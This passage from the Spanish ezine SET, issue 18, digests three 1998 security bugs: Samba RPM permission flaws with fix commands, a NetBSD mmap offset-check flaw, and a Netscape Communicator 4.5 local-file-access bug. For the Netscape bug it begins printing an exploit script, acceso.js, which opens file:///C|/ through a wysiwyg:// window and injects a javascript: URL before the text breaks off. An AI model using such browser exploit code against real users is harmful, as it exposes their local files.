-[ 0x09 ]-------------------------------------------------------------------- -[ LOS BUGS DEL MES ]-------------------------------------------------------- -[ by SET Staff ]-----------------------------------------------------SET-18- -( 0x01 )- Para : Samba 1.9.18 (RedHat, Caldera y TurboLinux) Tema : Permisos y Spool Patch : Aqui, mas abajo Creditos : Andrew Tridgell Descripcion y Notas: En realidad se trata de dos vulnerabilidades detectadas en Noviembre de 1998 por el equipo de desarrollo de Samba. La primera vulnerabildad versa sobre los permisos del programa wsmbconf, que el RPM correspondiente instala con setgid para el grupo root, y siendo ejecutable para todos los usuarios. (Ay!) La segunda, pues que el archivo spec crea un area de spool en el directorio /var/spool/samba, con permisos de escritura para todo el mundo, pero sin activar el bit t (sticky). Este bit debe de permanecer activo en todos los directorios de spool de Samba. Se presupone que los unicos sistemas afectados son RedHat Linux, Caldera OpenLinux y PHT TurboLinux, siempre que incluyan el RPM correspondiente a esta version. Una forma rapida de comprobar si la distribucion de Samba que tenemos instalada es vulnerable es corroborar la existencia de /usr/sbin/wsmbconf, pues se trata de un programa que no se deberia distribuir, por tratarse de un prototipo. Asi que el patch consta de dos partes. Para el primer caso bastara con: rm -f /usr/sbin/wsmbconf Para la segunda, pues con otra linea todo solucionado: chmod +t /var/spool/samba -( 0x02 )- Para : NetBSD 1.3.2 Tema : Acceso a memoria Patch : Lo dan los de Berkeley Creditos : Chris G. Demetriou, Ted Lemon y Matthew Green Descripcion y Notas: Bueno, realmente no es un bug que aparezca por culpa de los chicos de BSD. Al menos no directamente ;) Se trata de un error al chequear un parametro en el mmap(2). El problema surge cuando algun controlador de dispositivo que hace uso de mmap no chequea que el parametro offset es un valor entero con signo. Al no comprobar los valores negativos se producen diferentes modos de fallo. Los chicos de BSD nos ponen un ejemplo con NetBSD/i386 y NetBSD/macppc. En el primero, el controlador de la consola de texto autoriza el acceso a tan solo los 640 primeros Kbytes de memoria, mientras que el segundo da acceso a toda la memoria fisica. Advierten ademas de la posibilidad de que el mismo fallo se produzca en aquellos sistemas operativos que integran un control mmap derivado del 4.4BSD El patch lo podeis localizar en: ftp://ftp.netbsd.org/pub/NetBSD/misc/security/patches/19981120-d_mmap -( 0x03 )- Para : Netscape Communicator 4.5 para Windows 95 y NT 4.0 Tema : Acceso a ficheros Patch : Nada, nada. Como el lynx no hay nada. Creditos : Georgi Guninski <++> set_018/exploits/acceso.js sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open(); sl2.location="javascript:s='